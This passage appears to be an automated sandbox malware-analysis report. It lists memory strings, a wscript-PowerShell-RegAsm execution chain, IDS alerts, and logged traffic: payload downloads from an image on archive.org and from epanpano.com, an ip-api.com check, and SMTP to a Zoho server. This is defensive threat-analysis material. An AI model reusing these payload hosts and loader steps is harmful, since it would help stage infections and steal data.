Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe	Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 78.142.208.13:443 -> 192.168.2.8:49706
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.227.86:443 -> 192.168.2.8:49705

Yara detected Generic Downloader

Source: Yara match	File source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.1a8e949b578.1.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.8:49708 -> 185.230.212.164:587

Source: global traffic	HTTP traffic detected: GET /10/items/deathnote_202407/deathnote.jpg HTTP/1.1Host: ia601606.us.archive.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /log/ORGN.txt HTTP/1.1Host: epanpano.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 207.241.227.86 207.241.227.86
Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 185.230.212.164 185.230.212.164

Source: Joe Sandbox View	ASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
Source: Joe Sandbox View	ASN Name: TUT-ASUS TUT-ASUS
Source: Joe Sandbox View	ASN Name: COMPUTERLINEComputerlineSchlierbachSwitzerlandCH COMPUTERLINEComputerlineSchlierbachSwitzerlandCH
Source: Joe Sandbox View	ASN Name: VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ip-api.com

Source: global traffic

TCP traffic: 192.168.2.8:49708 -> 185.230.212.164:587

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /10/items/deathnote_202407/deathnote.jpg HTTP/1.1Host: ia601606.us.archive.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /log/ORGN.txt HTTP/1.1Host: epanpano.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: ia601606.us.archive.org
Source: global traffic	DNS traffic detected: DNS query: epanpano.com
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: smtp.zoho.eu

Source: RegAsm.exe, 00000007.00000002.2713398889.00000000060B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2697982737.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2698787111.000000000106A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2698971154.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2699963900.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2699963900.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2713398889.0000000006096000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0
Source: RegAsm.exe, 00000007.00000002.2713398889.00000000060B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2697982737.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2698787111.000000000106A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2698971154.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2699963900.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2699963900.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2713398889.0000000006096000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p
Source: powershell.exe, 00000004.00000002.1568396921.000001A8F14C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: RegAsm.exe, 00000007.00000002.2712744340.0000000006020000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2697982737.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2698787111.000000000106A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2699963900.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2699963900.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2713398889.0000000006096000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0=
Source: powershell.exe, 00000004.00000002.1529607955.000001A8D9663000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://epanpano.com
Source: powershell.exe, 00000004.00000002.1529607955.000001A8DA747000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ia601606.us.archive.org
Source: RegAsm.exe, 00000007.00000002.2699963900.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: powershell.exe, 00000004.00000002.1545150331.000001A8E9449000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2699963900.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2697144825.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000004.00000002.1529607955.000001A8DAA19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: RegAsm.exe, 00000007.00000002.2712744340.0000000006020000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2697982737.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2698787111.000000000106A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2699963900.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2699963900.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2713398889.0000000006096000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0B
Source: powershell.exe, 00000004.00000002.1529607955.000001A8DA992000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1529607955.000001A8DA78F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1590939976.0000020211D60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1529607955.000001A8D9111000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2699963900.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegAsm.exe, 00000007.00000002.2699963900.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2699963900.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://smtp.zoho.eu
Source: RegAsm.exe, 00000007.00000002.2713398889.00000000060B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2697982737.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2698787111.000000000106A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2698971154.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2699963900.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2699963900.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2713398889.0000000006096000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://status.thawte.com0:
Source: powershell.exe, 00000004.00000002.1529607955.000001A8DA78F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000004.00000002.1529607955.000001A8DA992000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1529607955.000001A8DA78F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: RegAsm.exe, 00000007.00000002.2713398889.00000000060B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2697982737.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2698787111.000000000106A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2698971154.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2699963900.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2699963900.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2713398889.0000000006096000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000004.00000002.1566950890.000001A8F12C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000004.00000002.1545150331.000001A8E9449000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.2697144825.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
